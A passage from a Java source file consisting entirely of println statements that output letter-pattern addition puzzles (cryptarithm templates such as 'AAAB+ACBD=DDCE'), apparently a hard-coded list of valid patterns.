out.println(\"AAAA+BCBA=DAEB\");\n out.println(\"AAAA+BCBA=DBEC\");\n out.println(\"AAAA+BCBA=DDCE\");\n out.println(\"AAAA+BCBA=DDEC\");\n out.println(\"AAAA+BCBA=DDEE\");\n out.println(\"AAAA+BCBA=DDEF\");\n out.println(\"AAAA+BCBA=DECC\");\n out.println(\"AAAA+BCBA=DECD\");\n out.println(\"AAAA+BCBA=DEEB\");\n out.println(\"AAAA+BCBA=DEEC\");\n out.println(\"AAAA+BCBA=DEFC\");\n out.println(\"AAAA+BCBD=CDDE\");\n out.println(\"AAAA+BCBD=CEDC\");\n out.println(\"AAAA+BCBD=DBCE\");\n out.println(\"AAAA+BCBD=DBEE\");\n out.println(\"AAAA+BCBD=DDCE\");\n out.println(\"AAAA+BCBD=DDEB\");\n out.println(\"AAAA+BCBD=DDEE\");\n out.println(\"AAAA+BCBD=DECB\");\n out.println(\"AAAA+BCBD=DECC\");\n out.println(\"AAAA+BCBD=EBCC\");\n out.println(\"AAAA+BCBD=EECB\");\n out.println(\"AAAA+BCBD=EECC\");\n out.println(\"AAAA+BCCA=CAAB\");\n out.println(\"AAAA+BCCA=CBDC\");\n out.println(\"AAAA+BCCA=DADC\");\n out.println(\"AAAA+BCCA=DBBB\");\n out.println(\"AAAA+BCCA=DBEF\");\n out.println(\"AAAA+BCCA=DEBC\");\n out.println(\"AAAA+BCCA=DEDB\");\n out.println(\"AAAA+BCCA=DEDC\");\n out.println(\"AAAA+BCCA=DEFB\");\n out.println(\"AAAA+BCCD=CADA\");\n out.println(\"AAAA+BCCD=CADB\");\n out.println(\"AAAA+BCCD=CADC\");\n out.println(\"AAAA+BCCD=CADE\");\n out.println(\"AAAA+BCCD=CBDA\");\n out.println(\"AAAA+BCCD=CDDB\");\n out.println(\"AAAA+BCCD=CEDA\");\n out.println(\"AAAA+BCCD=DADB\");\n out.println(\"AAAA+BCCD=DBDE\");\n out.println(\"AAAA+BCDA=CABB\");\n out.println(\"AAAA+BCDA=CAED\");\n out.println(\"AAAA+BCDA=CBBC\");\n out.println(\"AAAA+BCDA=CBBD\");\n out.println(\"AAAA+BCDA=CBBE\");\n out.println(\"AAAA+BCDA=CBED\");\n out.println(\"AAAA+BCDA=CDEC\");\n out.println(\"AAAA+BCDA=CEAC\");\n out.println(\"AAAA+BCDA=CEBC\");\n out.println(\"AAAA+BCDA=CECD\");\n out.println(\"AAAA+BCDA=CEEB\");\n out.println(\"AAAA+BCDA=CEEC\");\n out.println(\"AAAA+BCDA=CEFF\");\n out.println(\"AAAA+BCDA=DAED\");\n out.println(\"AAAA+BCDA=DBAB\");\n out.println(\"AAAA+BCDA=DBCB\");\n out.println(\"AAAA+BCDA=DBCD\");\n out.println(\"AAAA+BCDA=DBED\");\n out.println(\"AAAA+BCDA=DDAC\");\n out.println(\"AAAA+BCDA=DDEC\");\n out.println(\"AAAA+BCDA=DEED\");\n out.println(\"AAAA+BCDA=EAEB\");\n out.println(\"AAAA+BCDA=EAED\");\n out.println(\"AAAA+BCDA=EAEF\");\n out.println(\"AAAA+BCDA=EBBF\");\n out.println(\"AAAA+BCDA=EBEC\");\n out.println(\"AAAA+BCDA=EDAC\");\n out.println(\"AAAA+BCDA=EDBB\");\n out.println(\"AAAA+BCDA=EDBD\");\n out.println(\"AAAA+BCDA=EDEC\");\n out.println(\"AAAA+BCDA=EEAB\");\n out.println(\"AAAA+BCDA=EEAC\");\n out.println(\"AAAA+BCDA=EEBB\");\n out.println(\"AAAA+BCDA=EECB\");\n out.println(\"AAAA+BCDA=EECD\");\n out.println(\"AAAA+BCDA=EFEC\");\n out.println(\"AAAA+BCDB=CABD\");\n out.println(\"AAAA+BCDB=CABE\");\n out.println(\"AAAA+BCDB=CECD\");\n out.println(\"AAAA+BCDC=CABD\");\n out.println(\"AAAA+BCDC=CEED\");\n out.println(\"AAAA+BCDC=DABB\");\n out.println(\"AAAA+BCDC=DAEB\");\n out.println(\"AAAA+BCDC=DBCA\");\n out.println(\"AAAA+BCDC=DBEA\");\n out.println(\"AAAA+BCDC=DDBA\");\n out.println(\"AAAA+BCDC=DDEB\");\n out.println(\"AAAA+BCDC=DECB\");\n out.println(\"AAAA+BCDC=DECD\");\n out.println(\"AAAA+BCDC=DEED\");\n out.println(\"AAAA+BCDC=EDBA\");\n out.println(\"AAAA+BCDD=CBAB\");\n out.println(\"AAAA+BCDD=CDAB\");\n out.println(\"AAAA+BCDD=CDEF\");\n out.println(\"AAAA+BCDD=DDAB\");\n out.println(\"AAAA+BCDD=EDAB\");\n out.println(\"AAAA+BCDE=CABD\");\n out.println(\"AAAA+BCDE=CAEB\");\n out.println(\"AAAA+BCDE=DBEB\");\n out.println(\"AAAA+BCDE=DBFD\");\n out.println(\"AAAA+BCDE=EBEC\");\n out.println(\"AAAA+BCDE=FAEF\");\n out.println(\"AAAA+BCDE=FDEF\");\n out.println(\"AAAB+AAAA=BBCD\");\n out.println(\"AAAB+AAAB=CCBC\");\n out.println(\"AAAB+AAAC=BBCA\");\n out.println(\"AAAB+AAAC=BBCD\");\n out.println(\"AAAB+AAAC=CCBA\");\n out.println(\"AAAB+AAAC=CCBD\");\n out.println(\"AAAB+AABA=BCDE\");\n out.println(\"AAAB+AABA=CBAD\");\n out.println(\"AAAB+AABA=CBDE\");\n out.println(\"AAAB+AABB=CBAC\");\n out.println(\"AAAB+AABB=CBDE\");\n out.println(\"AAAB+AABB=CCDC\");\n out.println(\"AAAB+AABB=CDEA\");\n out.println(\"AAAB+AABB=CDEE\");\n out.println(\"AAAB+AABC=BCDA\");\n out.println(\"AAAB+AABC=BCDE\");\n out.println(\"AAAB+AABC=BDCE\");\n out.println(\"AAAB+AABC=BDEA\");\n out.println(\"AAAB+AABC=BDEB\");\n out.println(\"AAAB+AABC=BDED\");\n out.println(\"AAAB+AABC=CBAD\");\n out.println(\"AAAB+AABC=CBDA\");\n out.println(\"AAAB+AABC=CCCD\");\n out.println(\"AAAB+AABC=CDAA\");\n out.println(\"AAAB+AABC=CDEE\");\n out.println(\"AAAB+AABC=DBAA\");\n out.println(\"AAAB+AABC=DBCB\");\n out.println(\"AAAB+AABC=DBEB\");\n out.println(\"AAAB+AABC=DBED\");\n out.println(\"AAAB+AABC=DBEE\");\n out.println(\"AAAB+AABC=DECD\");\n out.println(\"AAAB+AABC=DEFA\");\n out.println(\"AAAB+AACA=BBBD\");\n out.println(\"AAAB+AACA=BCAD\");\n out.println(\"AAAB+AACA=BCDE\");\n out.println(\"AAAB+AACA=BDEC\");\n out.println(\"AAAB+AACA=BDED\");\n out.println(\"AAAB+AACA=BDEE\");\n out.println(\"AAAB+AACA=CDBE\");\n out.println(\"AAAB+AACA=CDEA\");\n out.println(\"AAAB+AACA=CDED\");\n out.println(\"AAAB+AACA=DBAE\");\n out.println(\"AAAB+AACA=DCBA\");\n out.println(\"AAAB+AACA=DCBE\");\n out.println(\"AAAB+AACA=DCEA\");\n out.println(\"AAAB+AACA=DCEE\");\n out.println(\"AAAB+AACB=BBBC\");\n out.println(\"AAAB+AACB=BBBD\");\n out.println(\"AAAB+AACB=BBDC\");\n out.println(\"AAAB+AACB=BCAD\");\n out.println(\"AAAB+AACB=BCDE\");\n out.println(\"AAAB+AACB=BDAE\");\n out.println(\"AAAB+AACB=BDEE\");\n out.println(\"AAAB+AACB=CBDC\");\n out.println(\"AAAB+AACB=CBDE\");\n out.println(\"AAAB+AACB=CCBC\");\n out.println(\"AAAB+AACB=CCBD\");\n out.println(\"AAAB+AACB=CCDC\");\n out.println(\"AAAB+AACB=CDBA\");\n out.println(\"AAAB+AACB=CDEA\");\n out.println(\"AAAB+AACB=CDEB\");\n out.println(\"AAAB+AACB=CDEC\");\n out.println(\"AAAB+AACB=DBEE\");\n out.println(\"AAAB+AACB=DCAA\");\n out.println(\"AAAB+AACB=DCBB\");\n out.println(\"AAAB+AACB=DCBE\");\n out.println(\"AAAB+AACB=DCEA\");\n out.println(\"AAAB+AACB=DCEB\");\n out.println(\"AAAB+AACB=DCED\");\n out.println(\"AAAB+AACB=DDDC\");\n out.println(\"AAAB+AACB=DEAA\");\n out.println(\"AAAB+AACB=DEBA\");\n out.println(\"AAAB+AACC=BBBD\");\n out.println(\"AAAB+AACC=BCAD\");\n out.println(\"AAAB+AACC=BCDA\");\n out.println(\"AAAB+AACC=BDAA\");\n out.println(\"AAAB+AACC=BDEE\");\n out.println(\"AAAB+AACC=CBDA\");\n out.println(\"AAAB+AACC=CBDE\");\n out.println(\"AAAB+AACC=CDBE\");\n out.println(\"AAAB+AACC=CDEA\");\n out.println(\"AAAB+AACC=CDEC\");\n out.println(\"AAAB+AACC=CDED\");\n out.println(\"AAAB+AACC=DCAA\");\n out.println(\"AAAB+AACC=DCBC\");\n out.println(\"AAAB+AACC=DCEC\");\n out.println(\"AAAB+AACC=DCED\");\n out.println(\"AAAB+AACC=DCEE\");\n out.println(\"AAAB+AACC=DEBD\");\n out.println(\"AAAB+AACC=DEFA\");\n out.println(\"AAAB+AACD=BCAA\");\n out.println(\"AAAB+AACD=BCDB\");\n out.println(\"AAAB+AACD=BCEB\");\n out.println(\"AAAB+AACD=BCEE\");\n out.println(\"AAAB+AACD=BDAA\");\n out.println(\"AAAB+AACD=BDEA\");\n out.println(\"AAAB+AACD=BEAA\");\n out.println(\"AAAB+AACD=CBDE\");\n out.println(\"AAAB+AACD=CBEA\");\n out.println(\"AAAB+AACD=CBEB\");\n out.println(\"AAAB+AACD=CBEC\");\n out.println(\"AAAB+AACD=CCBC\");\n out.println(\"AAAB+AACD=CCDC\");\n out.println(\"AAAB+AACD=CDBE\");\n out.println(\"AAAB+AACD=CDEA\");\n out.println(\"AAAB+AACD=CDEC\");\n out.println(\"AAAB+AACD=CDED\");\n out.println(\"AAAB+AACD=CEBB\");\n out.println(\"AAAB+AACD=CEBC\");\n out.println(\"AAAB+AACD=CEBE\");\n out.println(\"AAAB+AACD=CEDC\");\n out.println(\"AAAB+AACD=CEDD\");\n out.println(\"AAAB+AACD=CEDE\");\n out.println(\"AAAB+AACD=DBAA\");\n out.println(\"AAAB+AACD=DBEA\");\n out.println(\"AAAB+AACD=DCAA\");\n out.println(\"AAAB+AACD=DCBD\");\n out.println(\"AAAB+AACD=DCED\");\n out.println(\"AAAB+AACD=DCEE\");\n out.println(\"AAAB+AACD=DEAA\");\n out.println(\"AAAB+AACD=ECBA\");\n out.println(\"AAAB+AACD=ECBB\");\n out.println(\"AAAB+AACD=ECBC\");\n out.println(\"AAAB+AACD=ECBE\");\n out.println(\"AAAB+AACD=ECDA\");\n out.println(\"AAAB+AACD=ECDC\");\n out.println(\"AAAB+AACD=ECDD\");\n out.println(\"AAAB+AACD=ECDE\");\n out.println(\"AAAB+AACD=EFBF\");\n out.println(\"AAAB+AACD=EFDF\");\n out.println(\"AAAB+ABAB=BCDE\");\n out.println(\"AAAB+ABAB=CDBE\");\n out.println(\"AAAB+ABAB=CDDE\");\n out.println(\"AAAB+ABAB=CDEA\");\n out.println(\"AAAB+ABAC=BCDB\");\n out.println(\"AAAB+ABAC=BDCA\");\n out.println(\"AAAB+ABAC=BDDA\");\n out.println(\"AAAB+ABAC=BDDE\");\n out.println(\"AAAB+ABAC=BDEA\");\n out.println(\"AAAB+ABAC=BDEB\");\n out.println(\"AAAB+ABAC=DCBA\");\n out.println(\"AAAB+ABAC=DCCA\");\n out.println(\"AAAB+ABAC=DCCE\");\n out.println(\"AAAB+ABAC=DCED\");\n out.println(\"AAAB+ABAC=DEBA\");\n out.println(\"AAAB+ABAC=DEBB\");\n out.println(\"AAAB+ABBA=BAAC\");\n out.println(\"AAAB+ABBA=BCCD\");\n out.println(\"AAAB+ABBB=BAAC\");\n out.println(\"AAAB+ABBB=CDDD\");\n out.println(\"AAAB+ABBB=CDEA\");\n out.println(\"AAAB+ABBB=CDEC\");\n out.println(\"AAAB+ABBC=BAAA\");\n out.println(\"AAAB+ABBC=BADB\");\n out.println(\"AAAB+ABBC=BCCD\");\n out.println(\"AAAB+ABBC=BDCB\");\n out.println(\"AAAB+ABBC=BDCE\");\n out.println(\"AAAB+ABBC=BDDA\");\n out.println(\"AAAB+ABBC=BDDD\");\n out.println(\"AAAB+ABBC=CDCE\");\n out.println(\"AAAB+ABBC=DACB\");\n out.println(\"AAAB+ABBC=DCDE\");\n out.println(\"AAAB+ABBC=DECD\");\n out.println(\"AAAB+ABCA=BADD\");\n out.println(\"AAAB+ABCA=BDAE\");\n out.println(\"AAAB+ABCA=BDEE\");\n out.println(\"AAAB+ABCA=CADE\");\n out.println(\"AAAB+ABCA=CCDE\");\n out.println(\"AAAB+ABCA=CDBE\");\n out.println(\"AAAB+ABCA=CDDE\");\n out.println(\"AAAB+ABCA=CDEA\");\n out.println(\"AAAB+ABCA=CDEC\");\n out.println(\"AAAB+ABCA=CDEE\");\n out.println(\"AAAB+ABCA=CDEF\");\n out.println(\"AAAB+ABCA=DDBA\");\n out.println(\"AAAB+ABCA=DDEC\");\n out.println(\"AAAB+ABCA=DEEC\");\n out.println(\"AAAB+ABCA=DEED\");\n out.println(\"AAAB+ABCA=DEEF\");\n out.println(\"AAAB+ABCB=BADC\");\n out.println(\"AAAB+ABCB=BDBC\");\n out.println(\"AAAB+ABCB=BDDE\");\n out.println(\"AAAB+ABCB=BDED\");\n out.println(\"AAAB+ABCB=CADE\");\n out.println(\"AAAB+ABCB=CCDE\");\n out.println(\"AAAB+ABCB=CDAA\");\n out.println(\"AAAB+ABCB=CDAD\");\n out.println(\"AAAB+ABCB=CDBA\");\n out.println(\"AAAB+ABCB=CDBC\");\n out.println(\"AAAB+ABCB=CDDE\");\n out.println(\"AAAB+ABCB=CDEB\");\n out.println(\"AAAB+ABCB=CDEC\");\n out.println(\"AAAB+ABCB=DCAA\");\n out.println(\"AAAB+ABCB=DCEC\");\n out.println(\"AAAB+ABCB=DDBA\");\n out.println(\"AAAB+ABCB=DDBB\");\n out.println(\"AAAB+ABCB=DDEA\");\n out.println(\"AAAB+ABCB=DDEC\");\n out.println(\"AAAB+ABCB=DEAD\");\n out.println(\"AAAB+ABCB=DEBD\");\n out.println(\"AAAB+ABCB=DEDA\");\n out.println(\"AAAB+ABCB=DEDC\");\n out.println(\"AAAB+ABCB=DEEA\");\n out.println(\"AAAB+ABCC=BADA\");\n out.println(\"AAAB+ABCC=BCAB\");\n out.println(\"AAAB+ABCC=BDAA\");\n out.println(\"AAAB+ABCC=BDDE\");\n out.println(\"AAAB+ABCC=BDEE\");\n out.println(\"AAAB+ABCC=CADE\");\n out.println(\"AAAB+ABCC=CCBD\");\n out.println(\"AAAB+ABCC=CDAA\");\n out.println(\"AAAB+ABCC=CDEA\");\n out.println(\"AAAB+ABCC=CDEC\");\n out.println(\"AAAB+ABCC=CDEE\");\n out.println(\"AAAB+ABCC=DAED\");\n out.println(\"AAAB+ABCC=DCEA\");\n out.println(\"AAAB+ABCC=DCED\");\n out.println(\"AAAB+ABCC=DCEE\");\n out.println(\"AAAB+ABCC=DDBC\");\n out.println(\"AAAB+ABCC=DDBE\");\n out.println(\"AAAB+ABCC=DEEA\");\n out.println(\"AAAB+ABCD=BADB\");\n out.println(\"AAAB+ABCD=BCEE\");\n out.println(\"AAAB+ABCD=BDBB\");\n out.println(\"AAAB+ABCD=BDDE\");\n out.println(\"AAAB+ABCD=BEAE\");\n out.println(\"AAAB+ABCD=BEBB\");\n out.println(\"AAAB+ABCD=BEEB\");\n out.println(\"AAAB+ABCD=BEEC\");\n out.println(\"AAAB+ABCD=CADB\");\n out.println(\"AAAB+ABCD=CADE\");\n out.println(\"AAAB+ABCD=CAEA\");\n out.println(\"AAAB+ABCD=CAEC\");\n out.println(\"AAAB+ABCD=CAEE\");\n out.println(\"AAAB+ABCD=CCDE\");\n out.println(\"AAAB+ABCD=CCEA\");\n out.println(\"AAAB+ABCD=CCEB\");\n out.println(\"AAAB+ABCD=CCEC\");\n out.println(\"AAAB+ABCD=CCEE\");\n out.println(\"AAAB+ABCD=CDAE\");\n out.println(\"AAAB+ABCD=CDDA\");\n out.println(\"AAAB+ABCD=CDDB\");\n out.println(\"AAAB+ABCD=CDEA\");\n out.println(\"AAAB+ABCD=CDED\");\n out.println(\"AAAB+ABCD=CEBE\");\n out.println(\"AAAB+ABCD=CEDA\");\n out.println(\"AAAB+ABCD=CEDB\");\n out.println(\"AAAB+ABCD=CEDD\");\n out.println(\"AAAB+ABCD=CEEA\");\n out.println(\"AAAB+ABCD=CEEB\");\n out.println(\"AAAB+ABCD=DAEC\");\n out.println(\"AAAB+ABCD=DCBE\");\n out.println(\"AAAB+ABCD=DCEC\");\n out.println(\"AAAB+ABCD=DDAE\");\n out.println(\"AAAB+ABCD=DDBD\");\n out.println(\"AAAB+ABCD=DDEC\");\n out.println(\"AAAB+ABCD=DDEE\");\n out.println(\"AAAB+ABCD=EADB\");\n out.println(\"AAAB+ABCD=EAFB\");\n out.println(\"AAAB+ABCD=EAFC\");\n out.println(\"AAAB+ABCD=EDEE\");\n out.println(\"AAAB+ACAA=BADE\");\n out.println(\"AAAB+ACAA=BDDE\");\n out.println(\"AAAB+ACAA=BDEC\");\n out.println(\"AAAB+ACAA=CBDA\");\n out.println(\"AAAB+ACAA=CDDE\");\n out.println(\"AAAB+ACAA=CDEA\");\n out.println(\"AAAB+ACAA=DABC\");\n out.println(\"AAAB+ACAA=DABE\");\n out.println(\"AAAB+ACAA=DBCE\");\n out.println(\"AAAB+ACAA=DEBD\");\n out.println(\"AAAB+ACAA=DECA\");\n out.println(\"AAAB+ACAA=DECD\");\n out.println(\"AAAB+ACAB=BDEC\");\n out.println(\"AAAB+ACAB=BDED\");\n out.println(\"AAAB+ACAB=CBCD\");\n out.println(\"AAAB+ACAB=CBDA\");\n out.println(\"AAAB+ACAB=CBDB\");\n out.println(\"AAAB+ACAB=CDDC\");\n out.println(\"AAAB+ACAB=CDEA\");\n out.println(\"AAAB+ACAB=CDEB\");\n out.println(\"AAAB+ACAB=CDED\");\n out.println(\"AAAB+ACAB=DABC\");\n out.println(\"AAAB+ACAB=DABD\");\n out.println(\"AAAB+ACAB=DABE\");\n out.println(\"AAAB+ACAB=DBBC\");\n out.println(\"AAAB+ACAB=DBBD\");\n out.println(\"AAAB+ACAB=DBBE\");\n out.println(\"AAAB+ACAB=DBCA\");\n out.println(\"AAAB+ACAB=DBCD\");\n out.println(\"AAAB+ACAB=DEBC\");\n out.println(\"AAAB+ACAB=DEBE\");\n out.println(\"AAAB+ACAB=DECA\");\n out.println(\"AAAB+ACAB=DECB\");\n out.println(\"AAAB+ACAB=DECD\");\n out.println(\"AAAB+ACAC=CBDC\");\n out.println(\"AAAB+ACAC=CDBA\");\n out.println(\"AAAB+ACAC=CDDA\");\n out.println(\"AAAB+ACAC=CDDE\");\n out.println(\"AAAB+ACAC=CDEA\");\n out.println(\"AAAB+ACAC=CDEC\");\n out.println(\"AAAB+ACAC=DBBA\");\n out.println(\"AAAB+ACAC=DBBE\");\n out.println(\"AAAB+ACAC=DBCA\");\n out.println(\"AAAB+ACAC=DBED\");\n out.println(\"AAAB+ACAC=DECA\");\n out.println(\"AAAB+ACAC=DECC\");\n out.println(\"AAAB+ACAD=BADA\");\n out.println(\"AAAB+ACAD=BADE\");\n out.println(\"AAAB+ACAD=BDCE\");\n out.println(\"AAAB+ACAD=BDDA\");\n out.println(\"AAAB+ACAD=BDDE\");\n out.println(\"AAAB+ACAD=BECB\");\n out.println(\"AAAB+ACAD=BEDC\");\n out.println(\"AAAB+ACAD=BEDE\");\n out.println(\"AAAB+ACAD=CBBA\");\n out.println(\"AAAB+ACAD=CBBC\");\n out.println(\"AAAB+ACAD=CBBE\");\n out.println(\"AAAB+ACAD=CBDC\");\n out.println(\"AAAB+ACAD=CBDD\");\n out.println(\"AAAB+ACAD=CBDE\");\n out.println(\"AAAB+ACAD=CBEB\");\n out.println(\"AAAB+ACAD=CDBB\");\n out.println(\"AAAB+ACAD=CDBC\");\n out.println(\"AAAB+ACAD=CDBE\");\n out.println(\"AAAB+ACAD=CDDA\");\n out.println(\"AAAB+ACAD=CDDC\");\n out.println(\"AAAB+ACAD=CDDE\");\n out.println(\"AAAB+ACAD=CDED\");\n out.println(\"AAAB+ACAD=CEBA\");\n out.println(\"AAAB+ACAD=CEBB\");\n out.println(\"AAAB+ACAD=CEDA\");\n out.println(\"AAAB+ACAD=CEDD\");\n out.println(\"AAAB+ACAD=DABA\");\n out.println(\"AAAB+ACAD=DABE\");\n out.println(\"AAAB+ACAD=DBBA\");\n out.println(\"AAAB+ACAD=DBBE\");\n out.println(\"AAAB+ACAD=DBCE\");\n out.println(\"AAAB+ACAD=DEBC\");\n out.println(\"AAAB+ACAD=DEBE\");\n out.println(\"AAAB+ACAD=DECD\");\n out.println(\"AAAB+ACAD=EBBA\");\n out.println(\"AAAB+ACAD=EBCA\");\n out.println(\"AAAB+ACAD=EBCB\");\n out.println(\"AAAB+ACAD=EDCA\");\n out.println(\"AAAB+ACAD=EDCD\");\n out.println(\"AAAB+ACAD=EDDA\");\n out.println(\"AAAB+ACBA=BADE\");\n out.println(\"AAAB+ACBA=BBCD\");\n out.println(\"AAAB+ACBA=BDAD\");\n out.println(\"AAAB+ACBA=BDEC\");\n out.println(\"AAAB+ACBA=BDED\");\n out.println(\"AAAB+ACBA=CBAA\");\n out.println(\"AAAB+ACBA=CDED\");\n out.println(\"AAAB+ACBA=CDEF\");\n out.println(\"AAAB+ACBA=DECF\");\n out.println(\"AAAB+ACBB=BBCD\");\n out.println(\"AAAB+ACBB=BBDC\");\n out.println(\"AAAB+ACBB=BDAC\");\n out.println(\"AAAB+ACBB=BDCE\");\n out.println(\"AAAB+ACBB=BDEC\");\n out.println(\"AAAB+ACBB=BDED\");\n out.println(\"AAAB+ACBB=CADA\");\n out.println(\"AAAB+ACBB=CADD\");\n out.println(\"AAAB+ACBB=CBAB\");\n out.println(\"AAAB+ACBB=CBDA\");\n out.println(\"AAAB+ACBB=CBDC\");\n out.println(\"AAAB+ACBB=CDCE\");\n out.println(\"AAAB+ACBB=CDDE\");\n out.println(\"AAAB+ACBB=CDEC\");\n out.println(\"AAAB+ACBB=DAED\");\n out.println(\"AAAB+ACBB=DBCA\");\n out.println(\"AAAB+ACBB=DBCC\");\n out.println(\"AAAB+ACBB=DBCE\");\n out.println(\"AAAB+ACBB=DBEC\");\n out.println(\"AAAB+ACBB=DDAD\");\n out.println(\"AAAB+ACBB=DDCD\");\n out.println(\"AAAB+ACBB=DDEA\");\n out.println(\"AAAB+ACBB=DDED\");\n out.println(\"AAAB+ACBB=DDEE\");\n out.println(\"AAAB+ACBB=DEDC\");\n out.println(\"AAAB+ACBB=DEEA\");\n out.println(\"AAAB+ACBB=DEED\");\n out.println(\"AAAB+ACBC=BADE\");\n out.println(\"AAAB+ACBC=BBCD\");\n out.println(\"AAAB+ACBC=BDAA\");\n out.println(\"AAAB+ACBC=BDEA\");\n out.println(\"AAAB+ACBC=BDEB\");\n out.println(\"AAAB+ACBC=BDEE\");\n out.println(\"AAAB+ACBC=CADA\");\n out.println(\"AAAB+ACBC=CBAC\");\n out.println(\"AAAB+ACBC=CDAA\");\n out.println(\"AAAB+ACBC=CDDE\");\n out.println(\"AAAB+ACBC=CDEE\");\n out.println(\"AAAB+ACBC=DAED\");\n out.println(\"AAAB+ACBC=DBEA\");\n out.println(\"AAAB+ACBC=DBED\");\n out.println(\"AAAB+ACBC=DBEE\");\n out.println(\"AAAB+ACBC=DDCB\");\n out.println(\"AAAB+ACBC=DDCE\");\n out.println(\"AAAB+ACBC=DEEA\");\n out.println(\"AAAB+ACBD=BADB\");\n out.println(\"AAAB+ACBD=BAEE\");\n out.println(\"AAAB+ACBD=BBCA\");\n out.println(\"AAAB+ACBD=BBCC\");\n out.println(\"AAAB+ACBD=BBEA\");\n out.println(\"AAAB+ACBD=BBEB\");\n out.println(\"AAAB+ACBD=BBEE\");\n out.println(\"AAAB+ACBD=BDCC\");\n out.println(\"AAAB+ACBD=BDDB\");\n out.println(\"AAAB+ACBD=BDDE\");\n out.println(\"AAAB+ACBD=BDEE\");\n out.println(\"AAAB+ACBD=BECE\");\n out.println(\"AAAB+ACBD=BEDB\");\n out.println(\"AAAB+ACBD=BEDE\");\n out.println(\"AAAB+ACBD=BEEB\");\n out.println(\"AAAB+ACBD=CADB\");\n out.println(\"AAAB+ACBD=CBEE\");\n out.println(\"AAAB+ACBD=CDCB\");\n out.println(\"AAAB+ACBD=CDEC\");\n out.println(\"AAAB+ACBD=CECB\");\n out.println(\"AAAB+ACBD=CEEB\");\n out.println(\"AAAB+ACBD=DADE\");\n out.println(\"AAAB+ACBD=DBAA\");\n out.println(\"AAAB+ACBD=DBAC\");\n out.println(\"AAAB+ACBD=DBAE\");\n out.println(\"AAAB+ACBD=DBCA\");\n out.println(\"AAAB+ACBD=DBEA\");\n out.println(\"AAAB+ACBD=DBEE\");\n out.println(\"AAAB+ACBD=DDAA\");\n out.println(\"AAAB+ACBD=DDCA\");\n out.println(\"AAAB+ACBD=DDCC\");\n out.println(\"AAAB+ACBD=DDCE\");\n out.println(\"AAAB+ACBD=DDEF\");\n out.println(\"AAAB+ACBD=DECA\");\n out.println(\"AAAB+ACBD=DECF\");\n out.println(\"AAAB+ACBD=EADB\");\n out.println(\"AAAB+ACBD=EAFB\");\n out.println(\"AAAB+ACBD=EBCA\");\n out.println(\"AAAB+ACBD=EBFF\");\n out.println(\"AAAB+ACBD=EDCC\");\n out.println(\"AAAB+ACBD=EDDE\");\n out.println(\"AAAB+ACBD=EEDE\");\n out.println(\"AAAB+ACBD=EEDF\");\n out.println(\"AAAB+ACBD=EFCC\");\n out.println(\"AAAB+ACCA=BDBE\");\n out.println(\"AAAB+ACCA=BDEC\");\n out.println(\"AAAB+ACCA=CABD\");\n out.println(\"AAAB+ACCA=CADA\");\n out.println(\"AAAB+ACCA=CADC\");\n out.println(\"AAAB+ACCA=CBDE\");\n out.println(\"AAAB+ACCA=CDBA\");\n out.println(\"AAAB+ACCA=CDDD\");\n out.println(\"AAAB+ACCA=CDEC\");\n out.println(\"AAAB+ACCA=DABA\");\n out.println(\"AAAB+ACCA=DADC\");\n out.println(\"AAAB+ACCA=DBDE\");\n out.println(\"AAAB+ACCB=BDBC\");\n out.println(\"AAAB+ACCB=BDBE\");\n out.println(\"AAAB+ACCB=BDED\");\n out.println(\"AAAB+ACCB=BDEE\");\n out.println(\"AAAB+ACCB=CAAA\");\n out.println(\"AAAB+ACCB=CABD\");\n out.println(\"AAAB+ACCB=CADA\");\n out.println(\"AAAB+ACCB=CADB\");\n out.println(\"AAAB+ACCB=CADE\");\n out.println(\"AAAB+ACCB=CBBD\");\n out.println(\"AAAB+ACCB=CBDA\");\n out.println(\"AAAB+ACCB=CBDE\");\n out.println(\"AAAB+ACCB=CDBB\");\n out.println(\"AAAB+ACCB=CDBC\");\n out.println(\"AAAB+ACCB=CDDA\");\n out.println(\"AAAB+ACCB=CDDD\");\n out.println(\"AAAB+ACCB=CDEC\");\n out.println(\"AAAB+ACCB=CDED\");\n out.println(\"AAAB+ACCB=CDEE\");\n out.println(\"AAAB+ACCB=DABA\");\n out.println(\"AAAB+ACCB=DABB\");\n out.println(\"AAAB+ACCB=DABC\");\n out.println(\"AAAB+ACCB=DABE\");\n out.println(\"AAAB+ACCB=DADC\");\n out.println(\"AAAB+ACCB=DADD\");\n out.println(\"AAAB+ACCB=DBDA\");\n out.println(\"AAAB+ACCB=DBDE\");\n out.println(\"AAAB+ACCB=DEBC\");\n out.println(\"AAAB+ACCB=DEDA\");\n out.println(\"AAAB+ACCC=BDBE\");\n out.println(\"AAAB+ACCC=CAAA\");\n out.println(\"AAAB+ACCC=CADC\");\n out.println(\"AAAB+ACCC=CBBD\");\n out.println(\"AAAB+ACCC=CDBC\");\n out.println(\"AAAB+ACCC=CDBE\");\n out.println(\"AAAB+ACCC=CDDA\");\n out.println(\"AAAB+ACCC=CDDD\");\n out.println(\"AAAB+ACCC=DABC\");\n out.println(\"AAAB+ACCC=DBDE\");\n out.println(\"AAAB+ACCC=DEBD\");\n out.println(\"AAAB+ACCD=BABA\");\n out.println(\"AAAB+ACCD=BABC\");\n out.println(\"AAAB+ACCD=BADB\");\n out.println(\"AAAB+ACCD=CABA\");\n out.println(\"AAAB+ACCD=CABB\");\n out.println(\"AAAB+ACCD=CABC\");\n out.println(\"AAAB+ACCD=CADA\");\n out.println(\"AAAB+ACCD=CADC\");\n out.println(\"AAAB+ACCD=CADD\");\n out.println(\"AAAB+ACCD=CBDB\");\n out.println(\"AAAB+ACCD=CBDE\");\n out.println(\"AAAB+ACCD=CDBD\");\n out.println(\"AAAB+ACCD=CDBE\");\n out.println(\"AAAB+ACCD=CEBC\");\n out.println(\"AAAB+ACCD=CEDC\");\n out.println(\"AAAB+ACCD=DABD\");\n out.println(\"AAAB+ACCD=DADA\");\n out.println(\"AAAB+ACCD=DADC\");\n out.println(\"AAAB+ACDA=BABE\");\n out.println(\"AAAB+ACDA=BAEE\");\n out.println(\"AAAB+ACDA=BBAE\");\n out.println(\"AAAB+ACDA=BBCD\");\n out.println(\"AAAB+ACDA=BBEE\");\n out.println(\"AAAB+ACDA=BDCC\");\n out.println(\"AAAB+ACDA=BDED\");\n out.println(\"AAAB+ACDA=BEAE\");\n out.println(\"AAAB+ACDA=BEBC\");\n out.println(\"AAAB+ACDA=BEED\");\n out.println(\"AAAB+ACDA=CABA\");\n out.println(\"AAAB+ACDA=CBCA\");\n out.println(\"AAAB+ACDA=CBCD\");\n out.println(\"AAAB+ACDA=CBCE\");\n out.println(\"AAAB+ACDA=CDAC\");\n out.println(\"AAAB+ACDA=CDEC\");\n out.println(\"AAAB+ACDA=CDEE\");\n 